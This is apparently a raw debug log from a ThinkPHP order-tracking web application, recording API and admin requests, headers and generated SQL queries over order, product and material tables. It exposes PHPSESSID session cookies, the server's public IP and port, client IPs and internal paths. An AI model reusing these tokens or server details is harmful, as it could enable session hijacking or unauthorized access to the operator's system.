productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,parentproductinfo.id AS parentproductinfo__id,parentproductinfo.product_avatar AS parentproductinfo__product_avatar,parentproductinfo.name AS parentproductinfo__name,parentproductinfo.product_num AS parentproductinfo__product_num,parentproductinfo.kucun AS parentproductinfo__kucun,parentproductinfo.takeup_kucun AS parentproductinfo__takeup_kucun,parentproductinfo.staff_ids AS parentproductinfo__staff_ids,parentproductinfo.staff_names AS parentproductinfo__staff_names,parentproductinfo.pid AS parentproductinfo__pid,parentproductinfo.corresponding_num AS parentproductinfo__corresponding_num,parentproductinfo.position AS parentproductinfo__position,parentproductinfo.price AS parentproductinfo__price,parentproductinfo.factorymge_id AS parentproductinfo__factorymge_id,parentproductinfo.product_status AS parentproductinfo__product_status,parentproductinfo.admin_id AS parentproductinfo__admin_id,parentproductinfo.createtime AS parentproductinfo__createtime,parentproductinfo.updatetime AS parentproductinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `orderinfo`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_productinfo` `parentproductinfo` ON `orderinfo`.`pProductinfo_id`=`parentproductinfo`.`id` WHERE `orderinfo`.`pid` = '6576' AND ( order_status!= '6' ) [ RunTime:0.004400s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_purchaseorder` [ RunTime:0.001623s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001127s ] [ sql ] [ SQL ] SELECT `purchaseorder`.`id`,`purchaseorder`.`number`,`purchaseorder`.`supplier_factory_id`,`purchaseorder`.`sup_order_id`,`purchaseorder`.`material_id`,`purchaseorder`.`orderinfo_id`,`purchaseorder`.`order_amount`,`purchaseorder`.`kucun_amount`,`purchaseorder`.`amount`,`purchaseorder`.`lingqu_amount`,`purchaseorder`.`daohuo_amount`,`purchaseorder`.`price`,`purchaseorder`.`suppliercustomer_id`,`purchaseorder`.`factorymge_id`,`purchaseorder`.`admin_id`,`purchaseorder`.`order_status`,`purchaseorder`.`build_time`,`purchaseorder`.`remind_day`,`purchaseorder`.`end_time`,`purchaseorder`.`responsible_staffinfos`,`purchaseorder`.`responsible_staffinfovars`,`purchaseorder`.`bind_pro_id`,`purchaseorder`.`bind_mat_id`,`purchaseorder`.`beizhu`,`purchaseorder`.`feedback`,`purchaseorder`.`order_type`,`purchaseorder`.`guoqitime`,`purchaseorder`.`guoqi_status`,`purchaseorder`.`createtime`,`purchaseorder`.`updatetime`,`purchaseorder`.`is_modify`,material.id AS material__id,material.name AS material__name,material.number AS material__number,material.avatar AS material__avatar,material.amount AS material__amount,material.warn_amount AS material__warn_amount,material.occupy_amount AS material__occupy_amount,material.factorymge_id AS material__factorymge_id,material.is_stop_status AS material__is_stop_status,material.admin_id AS material__admin_id,material.price AS material__price,material.danwei AS material__danwei,material.quehuo_status AS material__quehuo_status,material.put_position AS material__put_position,material.is_has_sup AS material__is_has_sup,material.staff_ids AS material__staff_ids,material.staff_names AS material__staff_names,material.createtime AS material__createtime,material.updatetime AS material__updatetime,material.is_delete AS material__is_delete,bindmaterial.id AS bindmaterial__id,bindmaterial.name AS bindmaterial__name,bindmaterial.number AS bindmaterial__number,bindmaterial.avatar AS bindmaterial__avatar,bindmaterial.amount AS bindmaterial__amount,bindmaterial.warn_amount AS bindmaterial__warn_amount,bindmaterial.occupy_amount AS bindmaterial__occupy_amount,bindmaterial.factorymge_id AS bindmaterial__factorymge_id,bindmaterial.is_stop_status AS bindmaterial__is_stop_status,bindmaterial.admin_id AS bindmaterial__admin_id,bindmaterial.price AS bindmaterial__price,bindmaterial.danwei AS bindmaterial__danwei,bindmaterial.quehuo_status AS bindmaterial__quehuo_status,bindmaterial.put_position AS bindmaterial__put_position,bindmaterial.is_has_sup AS bindmaterial__is_has_sup,bindmaterial.staff_ids AS bindmaterial__staff_ids,bindmaterial.staff_names AS bindmaterial__staff_names,bindmaterial.createtime AS bindmaterial__createtime,bindmaterial.updatetime AS bindmaterial__updatetime,bindmaterial.is_delete AS bindmaterial__is_delete,bindproduct.id AS bindproduct__id,bindproduct.product_avatar AS bindproduct__product_avatar,bindproduct.name AS bindproduct__name,bindproduct.product_num AS bindproduct__product_num,bindproduct.kucun AS bindproduct__kucun,bindproduct.takeup_kucun AS bindproduct__takeup_kucun,bindproduct.staff_ids AS bindproduct__staff_ids,bindproduct.staff_names AS bindproduct__staff_names,bindproduct.pid AS bindproduct__pid,bindproduct.corresponding_num AS bindproduct__corresponding_num,bindproduct.position AS bindproduct__position,bindproduct.price AS bindproduct__price,bindproduct.factorymge_id AS bindproduct__factorymge_id,bindproduct.product_status AS bindproduct__product_status,bindproduct.admin_id AS bindproduct__admin_id,bindproduct.createtime AS bindproduct__createtime,bindproduct.updatetime AS bindproduct__updatetime FROM `ot_purchaseorder` `purchaseorder` LEFT JOIN `ot_material` `material` ON `purchaseorder`.`material_id`=`material`.`id` LEFT JOIN `ot_material` `bindmaterial` ON `purchaseorder`.`bind_mat_id`=`bindmaterial`.`id` LEFT JOIN `ot_productinfo` `bindproduct` ON `purchaseorder`.`bind_pro_id`=`bindproduct`.`id` WHERE `orderinfo_id` = 6576 AND `order_status` IN (1,2) AND `order_type` = 4 [ RunTime:0.000752s ] [ sql ] [ SQL ] UPDATE `ot_orderinfo` SET `produced_amount`=8621,`waste_amount`=0,`produced_time`=1658308093,`order_status`='3',`updatetime`=1658308093 WHERE `id` = 6576 [ RunTime:0.000321s ] --------------------------------------------------------------- [ 2022-07-20T17:08:14+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [运行时间:0.054257s][吞吐率:18.43req/s] [内存消耗:4,769.87kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001216s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001694s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000570s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001478s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000388s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001459s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001060s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308093>orderinfo.end_time desc,1658308093>orderinfo.end_time desc,1658308093-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002452s ] --------------------------------------------------------------- [ 2022-07-20T17:08:14+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018673s][吞吐率:53.55req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001071s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:24+08:00 ] 106.112.205.110 GET /admin/productmge/productinfo/index?sort=id&order=desc&offset=10&limit=10&filter=%7B%7D&op=%7B%7D&_=1658307484167 [ info ] 47.105.33.115:8081/admin/productmge/productinfo/index?sort=id&order=desc&offset=10&limit=10&filter=%7B%7D&op=%7B%7D&_=1658307484167 [运行时间:0.071888s][吞吐率:13.91req/s] [内存消耗:5,463.06kb] [文件加载:84] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001158s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'productmge.productinfo', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/productmge/productinfo?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=8uveookelkl3mdcrs65gsc4gp2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '10', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658307484167', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001569s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/productmge/productinfo.php [ info ] [ RUN ] app\admin\controller\productmge\Productinfo->index[ /alidata/www/gendan/application/admin/controller/productmge/Productinfo.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000126s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000463s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001401s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000511s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001597s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001526s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.002069s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001646s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 1 [ RunTime:0.000831s ] [ sql ] [ SQL ] SELECT `productinfo`.`id`,`productinfo`.`product_avatar`,`productinfo`.`name`,`productinfo`.`product_num`,`productinfo`.`kucun`,`productinfo`.`takeup_kucun`,`productinfo`.`staff_ids`,`productinfo`.`staff_names`,`productinfo`.`pid`,`productinfo`.`corresponding_num`,`productinfo`.`position`,`productinfo`.`price`,`productinfo`.`factorymge_id`,`productinfo`.`product_status`,`productinfo`.`admin_id`,`productinfo`.`createtime`,`productinfo`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 10,10 [ RunTime:0.000498s ] [ sql ] [ SQL ] SELECT `productinfo`.`id`,`productinfo`.`product_avatar`,`productinfo`.`name`,`productinfo`.`product_num`,`productinfo`.`kucun`,`productinfo`.`takeup_kucun`,`productinfo`.`staff_ids`,`productinfo`.`staff_names`,`productinfo`.`pid`,`productinfo`.`corresponding_num`,`productinfo`.`position`,`productinfo`.`price`,`productinfo`.`factorymge_id`,`productinfo`.`product_status`,`productinfo`.`admin_id`,`productinfo`.`createtime`,`productinfo`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,sum(kucun*price) as total FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 1 [ RunTime:0.001077s ] --------------------------------------------------------------- [ 2022-07-20T17:08:25+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020605s][吞吐率:48.53req/s] [内存消耗:2,227.84kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001170s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'image/webp,image/*,*/*;q=0.8', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/productmge/productinfo?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=8uveookelkl3mdcrs65gsc4gp2', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:53+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [运行时间:0.055234s][吞吐率:18.10req/s] [内存消耗:4,769.86kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001208s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001744s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000546s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001485s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000345s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001610s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001156s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308133>orderinfo.end_time desc,1658308133>orderinfo.end_time desc,1658308133-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.002462s ] --------------------------------------------------------------- [ 2022-07-20T17:08:54+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018685s][吞吐率:53.52req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001056s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:54+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021672s][吞吐率:46.14req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000059s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001190s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:55+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020808s][吞吐率:48.06req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001096s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:55+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019504s][吞吐率:51.27req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001165s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:56+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021125s][吞吐率:47.34req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000061s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001226s ] [ info ] [ LANG ] 